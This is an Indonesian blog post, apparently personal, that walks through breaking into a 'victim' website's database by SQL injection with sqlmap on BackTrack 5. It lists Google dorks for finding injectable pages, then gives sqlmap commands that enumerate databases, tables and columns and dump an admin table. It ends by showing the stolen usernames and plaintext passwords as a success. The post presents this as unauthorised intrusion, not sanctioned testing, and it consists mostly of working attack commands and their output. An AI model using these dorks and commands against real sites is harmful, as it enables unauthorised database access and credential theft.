Menembus database website vulner SQL-Injection
Berikut ini saya mencoba belajar menembus database website dengan menggunakan tools sqlmap di backtrack 5 :
Mencari celah SQL-Injection website si korban dengan menggunakan Dork Sql Injection
inurl:index.php?id=hasilnya saya mendapatkan sebuah celah di website
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:news.php?news=
/root]─> http://sikorban.com/news.php?news=212Buka tools sqlmap dengan cara
/root]─> Application - Backtrack - Exploitation Tools - Web Exploitation Tools - sqlmap
Ikuti perintah penggunnaan tools slmap di terminal/konsole, untuk mencari databaste website sikorban
/root]─>python sqlmap.py -u http://sikorban.com/news.php?news=212 --dbs
-u = url sikorban
- -dbs = mencari database website
setelah ketemu database nya sikorban lanjutkan dengan mencari tables yg berada dalam database
/root]─> python sqlmap.py -u http://sikorban.com/news.php?news=212 -D sikorban –tables
-D = database yg sudah ditemukan
- -tables = untuk membuka isi database dalam tables
isi tables telah ditemukan, selanjutnya saya mencari isi dari tables itu misalkan tables admin
/root]─>python sqlmap.py http://sikorban.com/news.php?news=212 -D sikorban -T admin --columns
-D = database yg sudah ditemukan
-T = isi tables
- -columns = untuk membuka isi tables dalam columns
selanjutnya saya extract columns tersebut dengan menggunakan perintah di terminal/konsole
/root]─>python sqlmap.py http://sikorban.com/news.php?news=212 -D sikorban -T admin -C no,pwd,status,uid --dump
-D = database yg sudah ditemukan
-T = isi tables
-C = untuk membuka isi columns
- -dump = menyimpan hasil file yg ditemukan, file tersebut berada di /pentest/database/sqlmap/output/sikorban.com
setelah belajar berbulan-bulan akhirnya berhasil juga mendapatkan userid passwd untuk masuk ke halaman panel login.
+————–+—-+——————+——–+
| uid | no | pwd | status |
+————–+—-+——————+——–+
| sikorban1 | 1 | admin1235321 | A |
| sikorban2 | 4 | tes23tes | I |
+———— -+—–+——————+——-+
No comments:
Post a Comment